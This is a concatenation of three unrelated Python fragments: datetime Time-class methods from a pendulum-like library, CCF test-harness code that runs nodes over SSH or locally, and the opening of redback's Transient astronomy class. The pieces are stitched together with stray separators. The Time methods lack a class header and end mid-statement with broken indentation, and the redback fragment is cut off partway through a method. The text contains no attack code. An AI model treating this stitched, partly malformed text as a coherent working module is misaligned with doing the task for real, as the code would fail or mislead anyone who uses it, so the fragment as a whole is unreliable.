    """
    Determine whether this instance lies between two other times.

    The bounds may be given in either order; they are normalised so the
    smaller one becomes the lower bound.

    :type dt1: Time or time
    :type dt2: Time or time

    :param equal: When True use inclusive (<=, >=) comparisons,
                  otherwise strict (<, >) ones.

    :rtype: bool
    """
    lower, upper = (dt1, dt2) if dt1 <= dt2 else (dt2, dt1)

    if equal:
        return lower <= self <= upper

    return lower < self < upper
def closest(self, dt1, dt2):
    """
    Return whichever of the two given times is nearer to this one.

    :type dt1: Time or time
    :type dt2: Time or time

    :rtype: Time
    """
    first = self.instance(dt1, False)
    second = self.instance(dt2, False)

    if self.diff(first).in_seconds() < self.diff(second).in_seconds():
        return first
    return second

def farthest(self, dt1, dt2):
    """
    Return whichever of the two given times is further from this one.

    :type dt1: Time or time
    :type dt2: Time or time

    :rtype: Time
    """
    first = self.instance(dt1, False)
    second = self.instance(dt2, False)

    if self.diff(first).in_seconds() > self.diff(second).in_seconds():
        return first
    return second
def min_(self, dt=None):
    """
    Return the smaller of this instance and ``dt`` (default: now).

    :type dt: Time or time or None

    :rtype: Time
    """
    other = Time.now() if dt is None else dt

    if self < other:
        return self

    return self.instance(other, False)

def minimum(self, dt=None):
    """
    Alias of :meth:`min_`.

    :type dt: Time or time or None

    :rtype: Time
    """
    return self.min_(dt)

def max_(self, dt=None):
    """
    Return the larger of this instance and ``dt`` (default: now).

    :type dt: Time or time or None

    :rtype: Time
    """
    other = Time.now() if dt is None else dt

    if self > other:
        return self

    return self.instance(other, False)

def maximum(self, dt=None):
    """
    Alias of :meth:`max_`.

    :type dt: Time or time or None

    :rtype: Time
    """
    return self.max_(dt)
def __hash__(self):
    # Delegate to the wrapped datetime.time so Time hashes consistently
    # with equal plain time objects.
    return hash(self._time)
# ADDITIONS AND SUBSTRACTIONS

def add(self, hours=0, minutes=0, seconds=0, microseconds=0):
    """
    Return a new Time with the given duration added.

    The arithmetic is delegated to a Pendulum anchored at the epoch so
    carries across hours/minutes/seconds are handled consistently.

    :param hours: The number of hours
    :type hours: int

    :param minutes: The number of minutes
    :type minutes: int

    :param seconds: The number of seconds
    :type seconds: int

    :param microseconds: The number of microseconds
    :type microseconds: int

    :rtype: Time
    """
    from .pendulum import Pendulum

    anchored = Pendulum.EPOCH.at(
        self._hour, self._minute, self._second, self._microsecond
    )
    shifted = anchored.add(
        hours=hours,
        minutes=minutes,
        seconds=seconds,
        microseconds=microseconds
    )

    return shifted.time()
def subtract(self, hours=0, minutes=0, seconds=0, microseconds=0):
    """
    Subtract a duration from the instance.

    :param hours: The number of hours
    :type hours: int

    :param minutes: The number of minutes
    :type minutes: int

    :param seconds: The number of seconds
    :type seconds: int

    :param microseconds: The number of microseconds
    :type microseconds: int

    :rtype: Time
    """
    # Delegate to a Pendulum anchored at the epoch so borrows across
    # hours/minutes/seconds are handled consistently.
    from .pendulum import Pendulum

    return Pendulum.EPOCH.at(
        self._hour, self._minute, self._second, self._microsecond
    ).subtract(
        hours=hours,
        minutes=minutes,
        seconds=seconds,
        microseconds=microseconds
    ).time()
def add_timedelta(self, delta):
    """
    Add a timedelta duration to the instance.

    Only the time-of-day portion of the delta is supported: a delta with
    a non-zero ``days`` component cannot be represented on a clock time.

    :param delta: The timedelta instance
    :type delta: datetime.timedelta

    :rtype: Time

    :raises TypeError: If ``delta`` has a non-zero ``days`` component.
    """
    if delta.days:
        # Fixed message: it previously read "Cannot timedelta with days ..."
        raise TypeError('Cannot add timedelta with days to Time.')

    return self.add(
        seconds=delta.seconds,
        microseconds=delta.microseconds
    )
def subtract_timedelta(self, delta):
    """
    Remove a timedelta duration from the instance.

    Only the time-of-day portion of the delta is supported: a delta with
    a non-zero ``days`` component cannot be represented on a clock time.

    :param delta: The timedelta instance
    :type delta: datetime.timedelta

    :rtype: Time

    :raises TypeError: If ``delta`` has a non-zero ``days`` component.
    """
    if delta.days:
        # Fixed message: it previously read "Cannot timedelta with days ..."
        raise TypeError('Cannot subtract timedelta with days to Time.')

    return self.subtract(
        seconds=delta.seconds,
        microseconds=delta.microseconds
    )
def __add__(self, other):
    """Support ``Time + timedelta``; any other operand type is rejected."""
    if isinstance(other, timedelta):
        return self.add_timedelta(other)

    return NotImplemented
def __sub__(self, other):
    """Support ``Time - timedelta`` (a Time) and ``Time - time`` (a signed
    Interval). Timezone-aware times are rejected."""
    if isinstance(other, timedelta):
        return self.subtract_timedelta(other)

    if isinstance(other, time):
        if other.tzinfo is not None:
            raise TypeError('Cannot subtract aware times to or from Time.')

        return self.instance(other).diff(self, False)

    return NotImplemented
def __rsub__(self, other):
    """Support ``time - Time`` for naive plain time objects (and Time)."""
    if not isinstance(other, (Time, time)):
        return NotImplemented

    if other.tzinfo is not None:
        raise TypeError('Cannot subtract aware times to or from Time.')

    return self.instance(other).__sub__(self)
# DIFFERENCES

def diff(self, dt=None, abs=True):
    """
    Return the difference between two Time objects as an Interval.

    :param dt: The time to compare against; defaults to now.
    :type dt: Time or time or None

    :param abs: Whether to return an absolute interval or not
    :type abs: bool

    :rtype: Interval
    """
    if dt is None:
        dt = self.now()
    else:
        dt = self.instance(dt, False)

    # Express both operands as microseconds since midnight. The previous
    # implementation dropped the microsecond component on both sides,
    # so sub-second differences were always reported as zero.
    us1 = (
        self.hour * SECS_PER_HOUR
        + self.minute * SECS_PER_MIN
        + self.second
    ) * USECS_PER_SEC + self.microsecond

    us2 = (
        dt.hour * SECS_PER_HOUR
        + dt.minute * SECS_PER_MIN
        + dt.second
    ) * USECS_PER_SEC + dt.microsecond

    klass = Interval
    if abs:
        klass = AbsoluteInterval

    return klass(microseconds=us2 - us1)
def diff_for_humans(self, other=None, absolute=False, locale=None):
    """
    Get the difference in a human readable format in the current locale.

    :type other: Time or time or None

    :param absolute: removes time difference modifiers ago, after, etc
    :type absolute: bool

    :param locale: The locale to use for localization
    :type locale: str

    :rtype: str
    """
    is_now = other is None

    if is_now:
        other = self.now()

    diff = self.diff(other)

    # Pick the largest non-zero unit; seconds is the fallback.
    if diff.hours > 0:
        unit = 'hour'
        count = diff.hours
    elif diff.minutes > 0:
        unit = 'minute'
        count = diff.minutes
    else:
        unit = 'second'
        count = diff.seconds

    if count == 0:
        # Never report "0 seconds"; round up to one.
        count = 1

    # NOTE(review): this local deliberately shadows the module-level
    # ``time`` import for the remainder of the function.
    time = self.translator().transchoice(unit, count, {'count': count}, locale=locale)

    if absolute:
        return time

    is_future = diff.invert

    if is_now:
        trans_id = 'from_now' if is_future else 'ago'
    else:
        trans_id = 'after' if is_future else 'before'

    # Some langs have special pluralization for past and future tense
    # (transchoice returns the key itself when no translation exists, so
    # a differing result means the tense-specific key is available).
    try_key_exists = '%s_%s' % (unit, trans_id)
    if try_key_exists != self.translator().transchoice(try_key_exists, count, locale=locale):
        time = self.translator().transchoice(try_key_exists, count, {'count': count}, locale=locale)

    return self.translator().trans(trans_id, {'time': time}, locale=locale)
# String formatting

def isoformat(self):
    """Return the time in ISO 8601 format, delegating to datetime.time."""
    return self._time.isoformat()
# Testing aids

@classmethod
def set_test_now(cls, test_now=None):
    """
    Install (or clear) a mock instance to be returned when a "now"
    instance is created, i.e. by a call to the classmethod now().

    Pass the default of ``None`` to clear the test instance and restore
    normal behaviour.

    :type test_now: Time or Pendulum or None

    :raises TypeError: If ``test_now`` is of an unsupported type.
    """
    from .pendulum import Pendulum

    acceptable = test_now is None or isinstance(test_now, (Pendulum, Time))
    if not acceptable:
        raise TypeError(
            'Time.set_test_now() only accepts a Time instance, '
            'a Pendulum instance or None.'
        )

    cls._test_now = test_now

@classmethod
def get_test_now(cls):
    """Return the mocked "now" as a Time, or None when unset."""
    mocked = cls._test_now
    if mocked is None:
        return None

    # A Pendulum mock is reduced to its time-of-day component.
    return mocked if isinstance(mocked, Time) else mocked.time()
# Compatibility methods
def replace(self, hour=None, minute=None, second=None, microsecond=None,
tzinfo=True):
if tzinfo is True:
tzinfo = self._tzinfo
hour = hour if hour is not None else self._hour
minute = minute | |
<filename>tests/infra/remote.py
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the Apache 2.0 License.
import os
import time
from enum import Enum
import paramiko
import logging
import subprocess
import getpass
from contextlib import contextmanager
import infra.path
import json
from loguru import logger as LOG
USER = getpass.getuser()
DBG = os.getenv("DBG", "cgdb")


def tmpdir_name(node_name):
    """Build the per-node scratch directory name.

    The name is ``<user>[_<job>]_<node_name>``, where the optional job
    component comes from the JOB_NAME environment variable (set by CI)
    with any slashes flattened to underscores.
    """
    parts = [USER]
    job = os.getenv("JOB_NAME")
    if job:
        parts.append(job.replace("/", "_"))
    parts.append(node_name)
    return "_".join(parts)
@contextmanager
def sftp_session(hostname):
    """Yield an open SFTP session to ``hostname``, guaranteeing that both
    the session and the underlying SSH client are closed on exit."""
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    ssh.connect(hostname)
    try:
        sftp = ssh.open_sftp()
        try:
            yield sftp
        finally:
            sftp.close()
    finally:
        ssh.close()
def log_errors(out_path, err_path):
    """Scan a node's captured stdout for error markers and report them.

    Lines beginning with "[!]" or "[!!]" in ``out_path`` are logged as
    errors; if any are found, the full contents of ``err_path`` are
    logged as well. I/O failures are logged but never raised.
    """
    error_count = 0
    try:
        with open(out_path, "r") as out_file:
            for line in out_file:
                if line.startswith(("[!]", "[!!]")):
                    LOG.error("{}: {}".format(out_path, line.rstrip()))
                    error_count += 1
        if error_count:
            try:
                with open(err_path, "r") as err_file:
                    LOG.error("{} contents:".format(err_path))
                    LOG.error(err_file.read())
            except IOError:
                LOG.exception("Could not read err output {}".format(err_path))
    except IOError:
        LOG.exception("Could not check output {} for errors".format(out_path))
class CmdMixin(object):
    """Command-line manipulation helpers shared by the remote runners."""

    def set_recovery(self):
        """Append the recovery flag, then de-duplicate the command line
        (order-preserving) in case the flag was already present."""
        self.cmd.append("--start=recover")
        self.cmd = list(dict.fromkeys(self.cmd))

    def set_perf(self):
        """Prefix the command with ``perf record`` to profile the run."""
        profiler = [
            "perf",
            "record",
            "--freq=1000",
            "--call-graph=dwarf",
            "-s",
        ]
        self.cmd = profiler + self.cmd
class SSHRemote(CmdMixin):
    def __init__(self, name, hostname, files, cmd):
        """
        Runs a command on a remote host, through an SSH connection. A temporary
        directory is created, and some files can be shipped over. The command is
        run out of that directory.

        Note that the name matters, since the temporary directory that will be first
        deleted, then created and populated is /tmp/`tmpdir_name(name)`. There is deliberately no
        cleanup on shutdown, to make debugging/inspection possible.

        setup() connects, creates the directory and ships over the files
        start() runs the specified command
        stop() disconnects, which shuts down the command via SIGHUP
        restart() reconnects and reruns the specified command
        """
        self.hostname = hostname
        self.files = files
        self.cmd = cmd
        self.client = paramiko.SSHClient()
        self.client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        self.root = os.path.join("/tmp", tmpdir_name(name))

    def _rc(self, cmd):
        """Run `cmd` on the remote host and return its exit status."""
        LOG.info("[{}] {}".format(self.hostname, cmd))
        _, stdout, _ = self.client.exec_command(cmd)
        return stdout.channel.recv_exit_status()

    def _connect(self):
        LOG.debug("[{}] connect".format(self.hostname))
        self.client.connect(self.hostname)

    def _setup_files(self):
        """Recreate the remote scratch directory, upload self.files, and
        make the target executable runnable."""
        assert self._rc("rm -rf {}".format(self.root)) == 0
        assert self._rc("mkdir {}".format(self.root)) == 0
        session = self.client.open_sftp()
        for path in self.files:
            tgt_path = os.path.join(self.root, os.path.basename(path))
            LOG.info("[{}] copy {} from {}".format(self.hostname, tgt_path, path))
            session.put(path, tgt_path)
        session.close()
        executable = self.cmd[0]
        if executable.startswith("./"):
            executable = executable[2:]
        assert self._rc("chmod +x {}".format(os.path.join(self.root, executable))) == 0

    def get(self, filename, timeout=60):
        """
        Get file called `filename` under the root of the remote. If the
        file is missing, wait for timeout, and raise an exception.

        If the file is present, it is copied to the CWD on the caller's host.

        This call spins up a separate client because we don't want to interrupt
        the main cmd that may be running.
        """
        with sftp_session(self.hostname) as session:
            for seconds in range(timeout):
                try:
                    session.get(os.path.join(self.root, filename), filename)
                    LOG.debug(
                        "[{}] found {} after {}s".format(
                            self.hostname, filename, seconds
                        )
                    )
                    break
                except Exception:
                    time.sleep(1)
            else:
                raise ValueError(filename)

    def list_files(self, timeout=60):
        """List the files in the remote scratch directory, retrying for up
        to `timeout` seconds before raising ValueError."""
        files = []
        with sftp_session(self.hostname) as session:
            for seconds in range(timeout):
                try:
                    files = session.listdir(self.root)
                    break
                except Exception:
                    time.sleep(1)
            else:
                raise ValueError(self.root)
        return files

    def get_logs(self):
        """Best-effort download of the captured "err" and "out" files to
        `<hostname>_err` / `<hostname>_out` locally."""
        with sftp_session(self.hostname) as session:
            for filename in ("err", "out"):
                try:
                    filepath = os.path.join(self.root, filename)
                    local_filepath = "{}_{}".format(self.hostname, filename)
                    session.get(filepath, local_filepath)
                    LOG.info("Downloaded {}".format(local_filepath))
                except Exception:
                    LOG.warning(
                        "Failed to download {} from {}".format(filepath, self.hostname)
                    )

    def start(self):
        """
        Start cmd on the remote host. stdout and err are captured to file locally.

        We create a pty on the remote host under which to run the command, so as to
        get a SIGHUP on disconnection.
        """
        cmd = self._cmd()
        LOG.info("[{}] {}".format(self.hostname, cmd))
        self.client.exec_command(cmd, get_pty=True)

    def stop(self):
        """
        Disconnect the client, and therefore shut down the command as well.
        """
        LOG.info("[{}] closing".format(self.hostname))
        self.get_logs()
        log_errors("{}_out".format(self.hostname), "{}_err".format(self.hostname))
        self.client.close()

    def restart(self):
        self._connect()
        self.start()

    def setup(self):
        """
        Connect to the remote host, empty the temporary directory if it exists,
        and populate it with the initial set of files.
        """
        self._connect()
        self._setup_files()

    def _cmd(self):
        # Unbuffered, detached-stdin invocation mirroring LocalRemote._cmd.
        return "cd {} && stdbuf -o0 ./{} 1>out 2>err 0</dev/null".format(
            self.root, " ".join(self.cmd)
        )

    def _dbg(self):
        return "cd {} && {} --args ./{}".format(self.root, DBG, " ".join(self.cmd))

    def wait_for_stdout_line(self, line, timeout):
        """Poll the remote "out" file until `line` appears (grep -F), using
        a dedicated SSH client so the main command's channel is untouched.

        :raises ValueError: If `line` is not seen within `timeout` seconds.
        """
        client = paramiko.SSHClient()
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        client.connect(self.hostname)
        try:
            for _ in range(timeout):
                # BUG FIX: poll through the freshly connected `client`; the
                # original used self.client, interrogating the main command
                # connection and leaving this helper client unused.
                _, stdout, _ = client.exec_command(
                    "grep -F '{}' {}/out".format(line, self.root)
                )
                if stdout.channel.recv_exit_status() == 0:
                    return
                time.sleep(1)
            raise ValueError(
                "{} not found in stdout after {} seconds".format(line, timeout)
            )
        finally:
            client.close()
@contextmanager
def ssh_remote(name, hostname, files, cmd):
    """
    Context Manager wrapper for SSHRemote: sets up the remote directory,
    starts the command, and guarantees stop() runs on exit.
    """
    session = SSHRemote(name, hostname, files, cmd)
    try:
        session.setup()
        session.start()
        yield session
    finally:
        session.stop()
class LocalRemote(CmdMixin):
    def __init__(self, name, hostname, files, cmd):
        """
        Local equivalent to the SSHRemote: runs `cmd` out of a scratch
        directory under /tmp on this machine, capturing stdout/stderr to
        files named "out" and "err" inside it.

        :param name: Node name; used to derive the scratch directory.
        :param hostname: Used only as a log prefix.
        :param files: Files copied into the scratch directory by setup().
        :param cmd: Command line to run, as a list of strings.
        """
        self.hostname = hostname
        self.files = files
        self.cmd = cmd
        self.root = os.path.join("/tmp", tmpdir_name(name))
        self.proc = None
        self.stdout = None
        self.stderr = None

    def _rc(self, cmd):
        """Run `cmd` through the shell and return its exit status."""
        LOG.info("[{}] {}".format(self.hostname, cmd))
        return subprocess.call(cmd, shell=True)

    def _setup_files(self):
        """Recreate the scratch directory, copy the files in, and make the
        target executable runnable (prefixing "./" when needed)."""
        assert self._rc("rm -rf {}".format(self.root)) == 0
        assert self._rc("mkdir {}".format(self.root)) == 0
        for path in self.files:
            tgt_path = os.path.join(self.root, os.path.basename(path))
            assert self._rc("cp {} {}".format(path, tgt_path)) == 0
        executable = self.cmd[0]
        if executable.startswith("./"):
            executable = executable[2:]
        else:
            self.cmd[0] = "./{}".format(self.cmd[0])
        assert self._rc("chmod +x {}".format(os.path.join(self.root, executable))) == 0

    def get(self, filename, timeout=60):
        """Wait up to `timeout` seconds for `filename` to appear under the
        scratch directory, then copy it to the current directory.

        :raises ValueError: If the file does not appear in time.
        """
        path = os.path.join(self.root, filename)
        for _ in range(timeout):
            if os.path.exists(path):
                break
            time.sleep(1)
        else:
            raise ValueError(path)
        assert self._rc("cp {} {}".format(path, filename)) == 0

    def list_files(self, timeout=60):
        """List the files in the scratch directory.

        `timeout` is accepted for interface parity with
        SSHRemote.list_files and is unused: a local listing cannot
        transiently fail the way a remote session can.
        """
        return os.listdir(self.root)

    def start(self):
        """
        Start cmd. stdout and err are captured to file locally.
        """
        cmd = self._cmd()
        LOG.info("[{}] {}".format(self.hostname, cmd))
        self.stdout = open(os.path.join(self.root, "out"), "wb")
        self.stderr = open(os.path.join(self.root, "err"), "wb")
        self.proc = subprocess.Popen(
            self.cmd, cwd=self.root, stdout=self.stdout, stderr=self.stderr
        )

    def stop(self):
        """
        Terminate the process (if any), close the capture files, and scan
        the captured output for error markers.
        """
        LOG.info("[{}] closing".format(self.hostname))
        if self.proc:
            self.proc.terminate()
            self.proc.wait()
        if self.stdout:
            self.stdout.close()
        if self.stderr:
            self.stderr.close()
        log_errors(os.path.join(self.root, "out"), os.path.join(self.root, "err"))

    def restart(self):
        self.start()

    def setup(self):
        """
        Empty the temporary directory if it exists,
        and populate it with the initial set of files.
        """
        self._setup_files()

    def _cmd(self):
        # Shell form of the command, mirroring what SSHRemote runs remotely.
        return "cd {} && {} 1>out 2>err".format(self.root, " ".join(self.cmd))

    def _dbg(self):
        # Same, but wrapped in the configured debugger (DBG env var).
        return "cd {} && {} --args {}".format(self.root, DBG, " ".join(self.cmd))

    def wait_for_stdout_line(self, line, timeout):
        """Poll the captured "out" file until an exact line match appears.

        Note this requires a whole-line match, unlike the substring grep
        used by SSHRemote.wait_for_stdout_line.

        :raises ValueError: If `line` is not seen within `timeout` seconds.
        """
        for _ in range(timeout):
            with open(os.path.join(self.root, "out"), "rb") as out:
                for out_line in out:
                    if out_line.strip().decode() == line.strip():
                        return
            time.sleep(1)
        raise ValueError(
            "{} not found in stdout after {} seconds".format(line, timeout)
        )
class CCFRemote(object):
    # Default binary name; replaced per-instance by the enclave-specific
    # path in __init__.
    BIN = "cchost"
    # Extra files to ship alongside the binary and enclave library.
    DEPS = []

    def __init__(
        self,
        lib_path,
        node_id,
        host,
        pubhost,
        raft_port,
        tls_port,
        remote_class,
        enclave_type,
        log_level,
        expect_quote,
        sig_max_tx,
        sig_max_ms,
        node_status,
        election_timeout,
        memory_reserve_startup,
        notify_server,
        ledger_file=None,
        sealed_secrets=None,
    ):
        """
        Run a ccf binary on a remote host.

        Builds the cchost command line from the given parameters and
        delegates execution to `remote_class` (SSHRemote or LocalRemote).
        """
        self.node_id = node_id
        self.host = host
        self.pubhost = pubhost
        self.raft_port = raft_port
        self.tls_port = tls_port
        self.pem = "{}.pem".format(node_id)
        self.quote = expect_quote
        self.node_status = node_status
        # When a quote is expected, self.quote becomes the quote file name;
        # otherwise it keeps the falsy expect_quote value and info() skips it.
        if expect_quote:
            self.quote = "quote{}.bin".format(node_id)
        self.BIN = infra.path.build_bin_path(self.BIN, enclave_type)
        self.ledger_file = ledger_file
        # Remote-side ledger file name (basename of the shipped file, or a
        # fresh per-node name when starting without an existing ledger).
        self.ledger_file_name = (
            os.path.basename(ledger_file)
            if ledger_file
            else "{}.ledger".format(node_id)
        )
        cmd = [
            self.BIN,
            "--enclave-file={}".format(lib_path),
            "--raft-election-timeout-ms={}".format(election_timeout),
            "--raft-host={}".format(host),
            "--raft-port={}".format(raft_port),
            "--tls-host={}".format(host),
            "--tls-pubhost={}".format(pubhost),
            "--tls-port={}".format(tls_port),
            "--ledger-file={}".format(self.ledger_file_name),
            "--node-cert-file={}".format(self.pem),
            "--enclave-type={}".format(enclave_type),
            "--log-level={}".format(log_level),
        ]
        # Optional flags are appended only when explicitly configured.
        if sig_max_tx is not None:
            cmd += ["--sig-max-tx={}".format(sig_max_tx)]
        if sig_max_ms is not None:
            cmd += ["--sig-max-ms={}".format(sig_max_ms)]
        if memory_reserve_startup is not None:
            cmd += ["--memory-reserve-startup={}".format(memory_reserve_startup)]
        if notify_server is not None:
            # Expect "host:port"; both parts must be non-empty.
            notify_server_host, *notify_server_port = notify_server.split(":")
            if not notify_server_host or not (
                notify_server_port and notify_server_port[0]
            ):
                raise ValueError(
                    "Notification server host:port configuration is invalid"
                )
            cmd += ["--notify-server-host={}".format(notify_server_host)]
            cmd += ["--notify-server-port={}".format(notify_server_port[0])]
        if expect_quote:
            cmd.append("--quote-file={}".format(self.quote))
        self.remote = remote_class(
            node_id,
            host,
            [self.BIN, lib_path]
            + self.DEPS
            + ([self.ledger_file] if self.ledger_file else [])
            + ([sealed_secrets] if sealed_secrets else []),
            cmd,
        )

    def setup(self):
        self.remote.setup()

    def start(self):
        # Start the node and return its connection/identity info.
        self.remote.start()
        return self.info()

    def restart(self):
        self.remote.restart()
        return self.info()

    def info(self):
        """Fetch the node certificate (and quote, when expected) and return
        the node description dict used by the test framework."""
        self.remote.get(self.pem)
        quote_bytes = []
        if self.quote:
            self.remote.get(self.quote)
            quote_bytes = infra.path.quote_bytes(self.quote)
        return {
            "host": self.host,
            "raftport": str(self.raft_port),
            "pubhost": self.pubhost,
            "tlsport": str(self.tls_port),
            "cert": infra.path.cert_bytes(self.pem),
            "quote": quote_bytes,
            "status": NodeStatus[self.node_status].value,
        }

    def node_cmd(self):
        # Shell command the underlying remote would run (for diagnostics).
        return self.remote._cmd()

    def debug_node_cmd(self):
        # Debugger-wrapped variant of node_cmd().
        return self.remote._dbg()

    def stop(self):
        try:
            self.remote.stop()
        except Exception:
            LOG.exception("Failed to shut down {} cleanly".format(self.node_id))

    def wait_for_stdout_line(self, line, timeout=5):
        return self.remote.wait_for_stdout_line(line, timeout)

    def set_recovery(self):
        self.remote.set_recovery()

    def set_perf(self):
        self.remote.set_perf()

    def get_sealed_secrets(self):
        """Download and return the name of the most recent sealed-secrets
        file produced by the node (lexicographically latest)."""
        files = self.remote.list_files()
        sealed_secrets_files = []
        for f in files:
            if f.startswith("sealed_secrets."):
                sealed_secrets_files.append(f)
        latest_sealed_secrets = sorted(sealed_secrets_files, reverse=True)[0]
        self.remote.get(latest_sealed_secrets)
        return latest_sealed_secrets

    def get_ledger(self):
        # Download the node's ledger file and return its name.
        self.remote.get(self.ledger_file_name)
        return self.ledger_file_name
@contextmanager
def ccf_remote(
    lib_path, node_id, host, pubhost, raft_port, tls_port, args, remote_class
):
    """
    Context Manager wrapper for CCFRemote

    NOTE(review): CCFRemote.__init__ takes (lib_path, node_id, host,
    pubhost, raft_port, tls_port, remote_class, enclave_type, ...), but
    this wrapper forwards ``args`` in the ``remote_class`` position and
    omits the remaining required parameters -- it appears stale relative
    to the constructor. Verify against callers before relying on it.
    """
    remote = CCFRemote(
        lib_path, node_id, host, pubhost, raft_port, tls_port, args, remote_class
    )
    try:
        remote.setup()
        remote.start()
        yield remote
    finally:
        remote.stop()
class NodeStatus(Enum):
pending = 0
| |
<filename>redback/transient/transient.py
from __future__ import annotations
from typing import Union
import matplotlib
import numpy as np
import pandas as pd
import redback
from redback.plotting import \
LuminosityPlotter, FluxDensityPlotter, IntegratedFluxPlotter, MagnitudePlotter
class Transient(object):
    # Supported data modes; `data_mode` must be one of these.
    DATA_MODES = ['luminosity', 'flux', 'flux_density', 'magnitude', 'counts', 'ttes']
    # Maps each data mode to the attribute holding its y-values.
    _ATTRIBUTE_NAME_DICT = dict(luminosity="Lum50", flux="flux", flux_density="flux_density",
                                counts="counts", magnitude="magnitude")
    # Default y-axis labels used by the plotting helpers.
    ylabel_dict = dict(luminosity=r'Luminosity [$10^{50}$ erg s$^{-1}$]',
                       magnitude=r'Magnitude',
                       flux=r'Flux [erg cm$^{-2}$ s$^{-1}$]',
                       flux_density=r'Flux density [mJy]',
                       counts=r'Counts')
    # Descriptors keyed by data-mode name (see redback.utils.DataModeSwitch);
    # presumably boolean views onto `data_mode` -- confirm in redback.utils.
    luminosity_data = redback.utils.DataModeSwitch('luminosity')
    flux_data = redback.utils.DataModeSwitch('flux')
    flux_density_data = redback.utils.DataModeSwitch('flux_density')
    magnitude_data = redback.utils.DataModeSwitch('magnitude')
    counts_data = redback.utils.DataModeSwitch('counts')
    tte_data = redback.utils.DataModeSwitch('ttes')
def __init__(
        self, time: np.ndarray = None, time_err: np.ndarray = None, time_mjd: np.ndarray = None,
        time_mjd_err: np.ndarray = None, time_rest_frame: np.ndarray = None, time_rest_frame_err: np.ndarray = None,
        Lum50: np.ndarray = None, Lum50_err: np.ndarray = None, flux: np.ndarray = None,
        flux_err: np.ndarray = None, flux_density: np.ndarray = None, flux_density_err: np.ndarray = None,
        magnitude: np.ndarray = None, magnitude_err: np.ndarray = None, counts: np.ndarray = None,
        ttes: np.ndarray = None, bin_size: float = None, redshift: float = np.nan, data_mode: str = None,
        name: str = '', photon_index: float = np.nan, use_phase_model: bool = False,
        frequency: np.ndarray = None, system: np.ndarray = None, bands: np.ndarray = None,
        active_bands: Union[np.ndarray, str] = None, **kwargs: None) -> None:
    """This is a general constructor for the Transient class. Note that you only need to give data corresponding to
    the data mode you are using. For luminosity data provide times in the rest frame, if using a phase model
    provide time in MJD, else use the default time (observer frame).

    :param time: Times in the observer frame.
    :type time: np.ndarray, optional
    :param time_err: Time errors in the observer frame.
    :type time_err: np.ndarray, optional
    :param time_mjd: Times in MJD. Used if using phase model.
    :type time_mjd: np.ndarray, optional
    :param time_mjd_err: Time errors in MJD. Used if using phase model.
    :type time_mjd_err: np.ndarray, optional
    :param time_rest_frame: Times in the rest frame. Used for luminosity data.
    :type time_rest_frame: np.ndarray, optional
    :param time_rest_frame_err: Time errors in the rest frame. Used for luminosity data.
    :type time_rest_frame_err: np.ndarray, optional
    :param Lum50: Luminosity values.
    :type Lum50: np.ndarray, optional
    :param Lum50_err: Luminosity error values.
    :type Lum50_err: np.ndarray, optional
    :param flux: Flux values.
    :type flux: np.ndarray, optional
    :param flux_err: Flux error values.
    :type flux_err: np.ndarray, optional
    :param flux_density: Flux density values.
    :type flux_density: np.ndarray, optional
    :param flux_density_err: Flux density error values.
    :type flux_density_err: np.ndarray, optional
    :param magnitude: Magnitude values for photometry data.
    :type magnitude: np.ndarray, optional
    :param magnitude_err: Magnitude error values for photometry data.
    :type magnitude_err: np.ndarray, optional
    :param counts: Counts for prompt data.
    :type counts: np.ndarray, optional
    :param ttes: Time-tagged events data for unbinned prompt data.
    :type ttes: np.ndarray, optional
    :param bin_size: Bin size for binning time-tagged event data.
    :type bin_size: float, optional
    :param redshift: Redshift value.
    :type redshift: float, optional
    :param data_mode: Data mode. Must be one from `Transient.DATA_MODES`.
    :type data_mode: str, optional
    :param name: Name of the transient.
    :type name: str, optional
    :param photon_index: Photon index value.
    :type photon_index: float, optional
    :param use_phase_model: Whether we are using a phase model.
    :type use_phase_model: bool, optional
    :param frequency: Array of band frequencies in photometry data.
    :type frequency: np.ndarray, optional
    :param system: System values.
    :type system: np.ndarray, optional
    :param bands: Band values.
    :type bands: np.ndarray, optional
    :param active_bands: List or array of active bands to be used in the analysis.
                         Use all available bands if 'all' is given.
    :type active_bands: Union[list, np.ndarray], optional
    :param kwargs: Additional callables:
                   bands_to_frequency: Conversion function to convert a list of bands to frequencies.
                                       Use redback.utils.bands_to_frequency if not given.
                   bin_ttes: Binning function for time-tagged event data.
                             Use redback.utils.bands_to_frequency if not given.
    :type kwargs: None, optional
    """
    self.bin_size = bin_size
    # Injectable helpers (mainly for testing); fall back to redback.utils.
    self.bin_ttes = kwargs.get("bin_ttes", redback.utils.bin_ttes)
    self.bands_to_frequency = kwargs.get("bands_to_frequency", redback.utils.bands_to_frequency)

    # Time-tagged events are immediately binned into (time, counts).
    if data_mode == 'ttes':
        time, counts = self.bin_ttes(ttes, self.bin_size)

    self.time = time
    self.time_err = time_err
    self.time_mjd = time_mjd
    self.time_mjd_err = time_mjd_err
    self.time_rest_frame = time_rest_frame
    self.time_rest_frame_err = time_rest_frame_err

    self.Lum50 = Lum50
    self.Lum50_err = Lum50_err
    self.flux = flux
    self.flux_err = flux_err
    self.flux_density = flux_density
    self.flux_density_err = flux_density_err
    self.magnitude = magnitude
    self.magnitude_err = magnitude_err
    self.counts = counts
    # Poisson errors for count data.
    self.counts_err = np.sqrt(counts) if counts is not None else None
    self.ttes = ttes

    # Bands and frequencies are kept in sync via set_bands_and_frequency.
    self._frequency = None
    self._bands = None
    self.set_bands_and_frequency(bands=bands, frequency=frequency)
    self.system = system
    self.active_bands = active_bands
    self.data_mode = data_mode
    self.redshift = redshift
    self.name = name
    self.use_phase_model = use_phase_model

    self.meta_data = None
    self.photon_index = photon_index
    # Default directory structure; subclasses/constructors override this.
    self.directory_structure = redback.get_data.directory.DirectoryStructure(
        directory_path=".", raw_file_path=".", processed_file_path=".")
@staticmethod
def load_data_generic(processed_file_path, data_mode="magnitude"):
"""Loads data from specified directory and file, and returns it as a tuple.
:param processed_file_path: Path to the processed file to load
:type processed_file_path: str
:param data_mode: Name of the data mode.
Must be from ['magnitude', 'flux_density', 'all']. Default is magnitude.
:type data_mode: str, optional
:return: Six elements when querying magnitude or flux_density data, Eight for 'all'.
:rtype: tuple
"""
df = pd.read_csv(processed_file_path)
time_days = np.array(df["time (days)"])
time_mjd = np.array(df["time"])
magnitude = np.array(df["magnitude"])
magnitude_err = np.array(df["e_magnitude"])
bands = np.array(df["band"])
